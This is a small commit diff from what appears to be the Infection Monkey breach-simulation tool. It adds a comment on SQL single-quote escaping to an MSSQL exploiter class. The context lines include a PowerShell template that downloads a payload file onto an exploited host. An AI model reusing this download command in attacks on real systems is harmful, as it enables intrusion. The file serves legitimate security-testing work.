Agent: Add a comment about escaping single quotes in SQL

2022-06-15 08:14:29 -04:00 · 2022-06-15 08:14:29 -04:00 · 62cc401981
parent 83a2a911e9
commit 62cc401981
1 changed files with 2 additions and 0 deletions
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@ -31,6 +31,8 @@ class MSSQLExploiter(HostExploiter):
    TMP_FILE_NAME = "tmp_monkey.bat"
    TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"

+    # Single quotes are escaped in SQL by using two of them.
+    # Example: 'It ain''t over ''til it''s over'
    MONKEY_DOWNLOAD_COMMAND = (
        "powershell (new-object System.Net.WebClient)."
        "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"